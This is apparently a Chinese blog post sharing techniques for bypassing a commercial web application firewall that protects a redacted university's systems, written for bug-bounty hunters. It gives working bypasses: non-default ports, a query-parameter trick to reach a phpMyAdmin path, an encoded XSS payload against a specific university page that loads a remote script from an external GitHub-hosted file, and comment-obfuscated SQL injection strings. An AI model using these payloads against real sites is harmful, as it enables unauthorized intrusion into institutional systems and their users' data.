██大学通用型WAF不完全绕过(持续非定期更新)
Update
该██大学WAF并非██大学自研,据推测只是某商用WAF
引子
每一个想日,啊呸,测试█大各个系统安全性的人都会遇到一只通用型WAF,这个冷酷的WAF一言不合就喜欢把包给reset掉。
这给各位想要刷SRC的小白帽造成了一定的困扰,本文来讲讲个人绕过这只WAF的经验。
同时如果学校负责搞这一块的人看到了,麻烦reinforce一下这个WAF,不要沉迷于炫酷的NDR和花哨的基于机器学习的防护了(求不开除)。
非默认端口导致完全绕过
- 测试HTTPS服务
- 测试8080/8081等端口的服务
从非主流端口刷洞往往会有惊喜哦~
路径限制绕过
这只WAF会对访问敏感路径加以限制,但是加上参数可以绕过。
- 比如想访问 xxx.██.edu.cn/phpmyadmin/会被拦截,访问 xxx.██.edu.cn/phpmyadmin/?id=1可以绕过
XSS防护绕过
最直白的payload类似<script> alert('xss'); </script>
但是你可以用<script src=来远程加载脚本,并绕过防护
来一个我们网安院的XSS
http://██.██.edu.cn/██/██?search=naive%22%3E%20%3Cmeta%20name=%22referrer%22%20content=%22never%22%20%3E%20%3Cscript%20src=%22https://cdn.jsdelivr.net/gh/TomAPU/xsstest/test.js%22%3E%3C/script%3E%20%3C!--
SQL注入绕过
SQL注入绕过
- Union注入时union select 1 from 2替换成union/*fuckyou//*a*//*!select*/1/*fuckyou//*a*//*!from*/2
- order by测试时直接把空格换成/**//**/
此评论已被作者删除。
回复删除把你的评论删了.gif
删除